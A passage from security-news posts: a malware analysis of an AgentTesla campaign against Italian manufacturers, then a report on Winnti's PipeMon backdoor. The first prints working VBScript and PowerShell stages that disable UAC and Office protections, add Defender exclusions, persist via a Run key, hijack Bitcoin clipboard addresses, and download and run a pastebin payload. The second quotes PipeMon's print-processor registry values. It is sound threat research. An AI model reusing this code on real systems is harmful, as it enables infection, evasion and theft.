0,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,32,61,32,39,100,58,92,39,10,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,41,32,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,97,116,104,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,120,99,108,117,115,105,111,110,10,125,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,41,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,114,111,99,101,115,115,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115,32,36,101,120,99,108,117,115,105,111,110,10,125,10,87,114,105,116,101,45,72,111,115,116,32,34,34,10,87,114,105,116,101,45,72,111,115,116,32,34,89,111,117,114,32,69,120,99,108,117,115,105,111,110,115,58,34,10,36,112,114,101,102,115,32,61,32,71,101,116,45,77,112,80,114,101,102,101,114,101,110,99,101,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,97,116,104,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115);[System.Text.Encoding]::ASCII.GetString($cici)|IEX”, null, objConfig, intProcessID)
CreateObject("WScript.Shell").RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA","0", "REG_DWORD"

Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Options\DontUpdateLinks", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\AllowDDE", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\AllowDDE", 1, "REG_DWORD"

Code Snippet 5

As seen in the code, a PowerShell script is hidden inside the variable named $cici as an array of decimal values, which is immediately converted back to the corresponding ASCII characters and executed.

$userPath = $env:USERPROFILE
$pathExclusions = New-Object System.Collections.ArrayList
$processExclusions = New-Object System.Collections.ArrayList
$pathExclusions.Add('C:\') > $null
$processExclusions.Add('Msbuild.exe') > $null
$processExclusions.Add('Calc.exe') > $null
$processExclusions.Add('powershell.exe') > $null
$processExclusions.Add('wscript.exe') > $null
$processExclusions.Add('mshta.exe') > $null
$processExclusions.Add('cmd.exe') > $null
$projectsFolder = 'd:\'
Add-MpPreference -ExclusionPath $projectsFolder
foreach ($exclusion in $pathExclusions)
{
    Write-Host "Adding Path Exclusion: " $exclusion
    Add-MpPreference -ExclusionPath $exclusion
}
foreach ($exclusion in $processExclusions)
{
    Write-Host "Adding Process Exclusion: " $exclusion
    Add-MpPreference -ExclusionProcess $exclusion
}
Write-Host ""
Write-Host "Your Exclusions:"
$prefs = Get-MpPreference
$prefs.ExclusionPath
$prefs.ExclusionProcess

Code snippet 6

Code Snippet 6 is PowerShell code that adds the following processes to the Microsoft Windows Anti-Malware (Defender) exclusions: msbuild, calc, powershell, wscript, mshta and cmd; the paths C:\ and d:\ are excluded as well.

Another script in this intricate chain is YL0je2fU:

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
CreateObject("WScript.Shell").RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\replcia", "mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell ((gp HKCU:\Software).mogale)|IEX"""", 0 : window.close"")", "REG_SZ"

CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\mogale”, “$cici=@(102,117,110,99,116,105,111,110,32,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,91,115,116,114,105,110,103,93,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,10,123,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,91,48,93,32,45,110,101,32,39,49,39,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,115,116,114,76,101,110,103,116,104,32,61,32,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,46,108,101,110,103,116,104,10,9,105,102,40,36,115,116,114,76,101,110,103,116,104,32,45,108,116,32,50,54,32,45,111,114,32,36,115,116,114,76,101,110,103,116,104,32,45,103,116,32,51,53,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,118,97,108,105,100,82,101,103,101,120,32,61,32,39,94,91,97,45,122,65,45,90,48,45,57,92,115,93,43,36,39,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,111,116,109,97,116,99,104,32,36,118,97,108,105,100,82,101,103,101,120,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,114,101,116,117,114,110,32,36,116,114,117,101,10,125,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,32,61,32,40,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,41,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,1
15,83,105,122,101,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,46,108,101,110,103,116,104,10,36,105,32,61,32,48,10,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,34,34,10,119,104,105,108,101,40,49,41,10,123,10,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,61,32,71,101,116,45,67,108,105,112,98,111,97,114,100,10,9,105,102,40,40,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,41,32,45,99,101,113,32,36,116,114,117,101,32,45,97,110,100,10,9,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,101,32,36,111,108,100,65,100,100,114,101,115,115,83,101,116,41,10,9,123,10,9,9,83,101,116,45,67,108,105,112,98,111,97,114,100,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,105,32,61,32,40,36,105,32,43,32,49,41,32,37,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,10,9,125,10,125);[System.Text.Encoding]::ASCII.GetString($cici)|IEX” , “REG_SZ”
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell.exe ((gp HKCU:\Software).mogale)|IEX", null, objConfig, intProcessID)
self.close
</script>

Code Snippet 7

In this case too, a PowerShell script is embedded using the same variable name “$cici”, but with the following body:

function isBitcoinAddress([string]$clipboardContent)
{
    if($clipboardContent[0] -ne '1')
    {
        return $false
    }

    $strLength = $clipboardContent.length
    if($strLength -lt 26 -or $strLength -gt 35)
    {
        return $false
    }

    $validRegex = '^[a-zA-Z0-9\s]+$'
    if($clipboardContent -cnotmatch $validRegex)
    {
        return $false
    }

    return $true
}
$bitcoinAddresses = ("19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W", "19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W")
$bitcoinAddressesSize = $bitcoinAddresses.length
$i = 0
$oldAddressSet = ""
while(1)
{
    $clipboardContent = Get-Clipboard
    if((isBitcoinAddress($clipboardContent)) -ceq $true -and
        $clipboardContent -cne $oldAddressSet)
    {
        Set-Clipboard $bitcoinAddresses[$i]
        $oldAddressSet = $bitcoinAddresses[$i]
        $i = ($i + 1) % $bitcoinAddressesSize
    }
}

Code Snippet 8

The script continuously checks the clipboard of the victim machine for Bitcoin addresses and replaces any it finds with one of its hardcoded addresses (the list holds five entries, all the same address). The last stage is UyFaSxgj:

<script language="&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;">
Const HIDDEN_WINDOW = 0
strComputer = "."
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create( "powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/eyGv9x4B'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)", null, objConfig, intProcessID)
self.close
</script>

Code Snippet 9

This component uses PowerShell to load a binary fetched from a paste, eyGv9x4B, but unfortunately, at the time of analysis, the paste had already been removed.

This example suggests the flexibility of the malicious infrastructure built by the attacker, where components can be removed or replaced at any moment.

The Payload

As previously stated, the final payload is AgentTesla. It remains one of the most widely adopted commodity malware families, built to steal a large amount of sensitive information about the victim. Over the past years we have constantly studied the evolution of this threat and enumerated all the sensitive data it grabs.

In this case too, we obtained the final payload and the configuration of the SMTP client through which it sends the stolen information:

Figure 13: Configuration of the AgentTesla SMTP client

The domain “atn-com.pw” was created ad hoc to manage the infection campaign. By studying the uptime of the domain we were able to reconstruct the threat actor's campaign timeline.


Figure 14: Information about the C2 uptime stats

As shown above, the domain was registered in the last days of January and remained active until the middle of April. After a short period of inactivity, it reappeared on the 2nd of May and has been active since then.

Conclusion

The actor hiding behind this campaign can undoubtedly be considered a persistent cyber-threat to many organizations operating in production sectors in Europe and, in the last months, also in Italy. Its intricate infection chain, developed and tested over the years, gave it the flexibility needed to bypass many layers of traditional security defences, manipulating the delivery infrastructure from time to time.

Over time, the actor’s delivery infrastructure was leveraged to install different kinds of malware: most of the time remote access trojans and information and credential stealers. Such malware types are capable of enabling cyber-espionage and IP theft operations, potentially to re-sell stolen information on dark markets.

We will no doubt keep tracking this threat.

Additional details, including IoCs and Yara rules, are available here:

Pierluigi Paganini

(SecurityAffairs – Italian manufacturing, hacking)

The post Cyber-Criminal espionage Operation insists on Italian Manufacturing appeared first on Security Affairs.

Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry

The Winnti hacking group continues to target the gaming industry; recently it used a new malware named PipeMon and a new method to achieve persistence.

Winnti hacking group is using a new malware dubbed PipeMon and a novel method to achieve persistence in attacks aimed at video game companies.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that under the Winnti umbrella there are several APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, Group 72, Blackfly, APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

PipeMon is a modular backdoor that was spotted by ESET researchers earlier this year on servers belonging to several developers of massively multiplayer online (MMO) games from South Korea and Taiwan. Each component of the backdoor is implemented by a DLL.

“In February 2020, we discovered a new, modular backdoor, which we named PipeMon. Persisting as a Print Processor, it was used by the Winnti Group against several video gaming companies that are based in South Korea and Taiwan and develop MMO (Massively Multiplayer Online) games.” reads the report published by the company. “Video games developed by these companies are available on popular gaming platforms and have thousands of simultaneous players.”


In one case analyzed by the researchers, the hackers compromised a victim’s build system and then planted malware inside the video game executable. In another case, the Winnti group compromised the game servers, which could have allowed the attackers to conduct several malicious actions, including the manipulation of in-game currencies for financial gain.

Experts noticed that the PipeMon backdoor was signed with a certificate belonging to a video game company that Winnti had already hacked in 2018.

Researchers also reported that the threat actors reused some C2 domains involved in other campaigns and used a custom login stealer that was previously associated with Winnti operations.

The experts discovered two PipeMon variants, but were able to describe the infection process and the persistence mechanism for only one of them.

The first stage of the PipeMon backdoor consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher.

The hackers achieved persistence by abusing Windows print processors (DLLs loaded by the print spooler). A malicious DLL loader is dropped into the directory where the print processors reside and registered as an alternative print processor by setting one of the following two registry values:

HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\PrintFiiterPipelineSvc\Driver = “DEment.dll”
 
HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors\lltdsvc1\Driver = “EntAppsvc.dll”

After registering the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe), which loads the malicious DLL.

Since the service starts every time the computer reboots, the attackers achieve persistence.

“After having registered the Print Processor, PipeMon restarts the print spooler service (spoolsv.exe). As a result, the malicious print process is loaded when the spooler service starts. Note that the Print Spooler service starts at each PC startup, which ensures persistence across system resets.” continues the report.

“This technique is really similar to the Print Monitor persistence technique (being used by DePriMon, for example) and, to our knowledge, has not been documented previously.”

PipeMon modules are DLLs exporting a function called IntelLoader and are loaded using a reflective loading technique.

The loader, responsible for loading the main modules (ManagerMain and GuardClient), is Win32CmdDll.dll and is stored in the Print Processors directory. Experts noticed that the modules are stored encrypted on disk in the same location, under innocuous-looking names.
